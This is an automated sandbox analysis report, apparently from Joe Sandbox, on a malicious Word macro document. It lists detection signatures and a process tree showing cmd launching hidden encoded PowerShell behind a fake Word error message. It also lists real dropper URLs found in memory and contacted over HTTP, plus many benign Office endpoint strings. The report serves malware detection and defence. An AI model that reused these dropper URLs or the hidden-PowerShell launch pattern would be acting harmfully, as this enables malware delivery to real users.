
Analysis Report Adjunto K_23165.doc

Overview

General Information

Sample Name: Adjunto K_23165.doc
Analysis ID: 369338
MD5: 0687dd1c4250049abd4c224485512ffd
SHA1: ec31df47e6c68125b5bdc9355ee5abd23d82fdbe
SHA256: 6cb7ee70743f849d9c174fb6b6d672b11d7dcb0f208f869f58deb7956119500e

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates a big amount of memory (probably used for heap spraying)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 4928 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cmd.exe (PID: 6276 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD <base64-encoded PowerShell payload omitted> MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msg.exe (PID: 6320 cmdline: msg user /v Word experienced an error trying to open the file. MD5: EEB395D8DD3C1D6593903BD640687948)
    • powershell.exe (PID: 6388 cmdline: POwersheLL -w hidden -ENCOD <base64-encoded PowerShell payload omitted> MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.345480292.000001924A410000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x2ba:$s1: POwersheLL
00000005.00000002.340406464.0000019232AD8000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x658c:$s1: POwersheLL
  • 0xa2cc:$s1: POwersheLL
  • 0xf2ae:$s1: POwersheLL
00000005.00000002.340509636.0000019232B22000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x6cf4:$s1: POwersheLL
  • 0xaa34:$s1: POwersheLL
  • 0xfa16:$s1: POwersheLL
00000005.00000002.341303023.0000019232EE5000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x500:$s1: POwersheLL
  • 0x448e:$s1: PowerShell
  • 0x448e:$sr1: PowerShell
  • 0x448e:$sn3: PowerShell
00000005.00000003.262229379.000001924A61C000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x480:$s1: POwersheLL
  • 0x84a0:$s1: POwersheLL

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis | Data: Command: POwersheLL -w hidden -ENCOD <base64-encoded PowerShell payload omitted>

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK | Avira URL Cloud: Label: malware
Source: https://giatot365.com/wp-content/uploads/2020/Sx/ | Avira URL Cloud: Label: malware
Source: https://www.calltorepair.com/wp-content/themes/thefox/style.css | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo-300x115.png | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/blog/ | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/project/world-business/ | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/includes/Flexslider/flexslider.css | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/includes/zilla-likes/styles/zilla-likes.css | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/includes/prettyPhoto/css/prettyPhoto.css | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.png | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-json/ | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/uploads/2021/01/big_mob_logo-1.png | Avira URL Cloud: Label: phishing
Source: http://cherkashchanu.com/Z:/4ZE8/ | Avira URL Cloud: Label: malware
Source: https://www.calltorepair.com/wp-content/themes/thefox/js/html5.js | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreatu | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/css/animations.css | Avira URL Cloud: Label: phishing
Source: http://tongdaihanoi.com/847346324234234/rpnvXm/ | Avira URL Cloud: Label: malware
Source: https://www.calltorepair.com/project/luv-summer/ | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/css/thefox_js_composer.css | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-admin/admin-ajax.php | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/xmlrpc.php?rsd | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/about-us/ | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/css/rs6.css | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/style_end.css | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-includes/css/dist/block-library/style.min.css | Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/project/great-project/ | Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: calltorepair.com | Virustotal: Detection: 9%
Source: giatot365.com | Virustotal: Detection: 8%
Source: opheliasbrewery.com | Virustotal: Detection: 13%
Source: xuanthinhshop.com | Virustotal: Detection: 9%
Multi AV Scanner detection for submitted file
Source: Adjunto K_23165.doc | Virustotal: Detection: 69%
Source: Adjunto K_23165.doc | Metadefender: Detection: 54%
Source: Adjunto K_23165.doc | ReversingLabs: Detection: 85%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 107.180.2.185:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 107.180.2.185:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb | source: powershell.exe, 00000005.00000003.336147480.000001924A3A2000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbn | source: powershell.exe, 00000005.00000003.336147480.000001924A3A2000.00000004.00000001.sdmp
Source: Binary string: System.pdb | source: powershell.exe, 00000005.00000003.335909907.000001924A3DA000.00000004.00000001.sdmp
Source: winword.exe | Memory has grown: Private usage: 0MB later: 88MB
Source: global traffic | DNS query: name: cherkashchanu.com
Source: global traffic | TCP traffic: 192.168.2.5:49721 -> 103.28.39.103:443
Source: global traffic | TCP traffic: 192.168.2.5:49720 -> 185.104.45.33:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in memory: <div id="logo_img"><a href="https://www.calltorepair.com"><img class="dark_logo desktop_logo" src="https://www.calltorepair.com/wp-content/uploads/2021/01/logo_v_low.png" alt="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies" title="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies"/><img class="white_logo desktop_logo" src="https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.png" alt="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies" title="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies"/><img class="dark_logo mobile_logo" src="https://www.calltorepair.com/wp-content/uploads/2021/01/logo_v_low.png" alt="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies" title="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies"/><img class="white_logo mobile_logo" src="https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.png" alt="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies" title="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies"/></a></div>
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmp | String found in memory: http://opheliasbrewery.com/wp-includes/ciAjcgj/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmp | String found in memory: http://tongdaihanoi.com/847346324234234/rpnvXm/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmp | String found in memory: http://cherkashchanu.com/Z:/4ZE8/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmp | String found in memory: https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmp | String found in memory: https://calltorepair.com/assets/09erZFF/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmp | String found in memory: http://servicios.semperti.com/wp-admin/2IyZE7k/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmp | String found in memory: https://giatot365.com/wp-content/uploads/2`
Source: global traffic | HTTP traffic detected: GET /Z:/4ZE8/ HTTP/1.1 | Host: cherkashchanu.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /847346324234234/rpnvXm/ HTTP/1.1 | Host: tongdaihanoi.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-includes/ciAjcgj/ HTTP/1.1 | Host: opheliasbrewery.com | Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View | ASN Name: UKRAINE-ASUA UKRAINE-ASUA
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: <div id="yt"> <a href="https://www.youtube.com/channel/UC9vlmpCi8mAWSIwah-4A6PA/featured" target="_blank"><i class="fa fa-youtube"></i></a></div> equals www.youtube.com (Youtube)
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: <div id="facebook"> <a href="https://www.facebook.com/calltorepairllc/" target="_blank" ><i class="fa fa-facebook"></i></a></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: <div class="widget rd_social_widget"><h2>Social Icons</h2><div class="sc_small_line widget_line"><span class="small_l_left"></span></div><div class='thefox_social_widget'><div class='thefox_social_widget_text'>Follow Us</div><div class='thefox_social_widget_icons clearfix'> <div id="facebook"> <a href="https://www.facebook.com/calltorepairllc/" target="_blank" ><i class="fa fa-facebook"></i></a></div> equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: cherkashchanu.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 16 Mar 2021 13:27:15 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: keep-alive | Vary: Accept-Encoding | X-Httpd: 1 | Host-Header: 8441280b0c35cbc1147f8ba998a563a7 | X-Proxy-Cache: HIT | Data Raw: <hex dump of the 404 response body omitted>
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: powershell.exe, 00000005.00000002.340831302.0000019232C47000.00000004.00000001.sdmpString found in binary or memory: https://calltorepair.com
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in binary or memory: https://calltorepair.com/assets/09erZFF/
Source: powershell.exe, 00000005.00000002.338922062.000001923272C000.00000004.00000001.sdmpString found in binary or memory: https://calltorepair.comx
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cdn.entity.
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://clients.config.office.net/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://config.edge.skype.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cortana.ai
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cortana.ai/api
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cr.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dev.cortana.ai
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://devnull.onenote.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://directory.services.
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Lato%3A100%2C300%2C400%2C600%2C700%2C900%7COpen
Source: powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.338722577.00000192326F9000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: powershell.exe, 00000005.00000002.340780682.0000019232C21000.00000004.00000001.sdmp | String found in binary or memory: https://giatot365.com
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmp | String found in binary or memory: https://giatot365.com/wp-content/uploads/2
Source: powershell.exe, 00000005.00000002.340589263.0000019232B6E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmp | String found in binary or memory: https://giatot365.com/wp-content/uploads/2020/Sx/
Source: powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmp | String found in binary or memory: https://giatot365.comx
Source: powershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000005.00000002.341700269.00000192330AC000.00000004.00000001.sdmp | String found in binary or memory: https://go.micro
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://graph.windows.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://graph.windows.net/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://layerslider.kreaturamedia.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://lifecycle.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://login.windows.local
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://management.azure.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://management.azure.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://messaging.office.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://ncus.contentsync.
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://officeapps.live.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://onedrive.live.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://onedrive.live.com/embed?
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://outlook.office.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://outlook.office365.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://powerlift.acompli.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
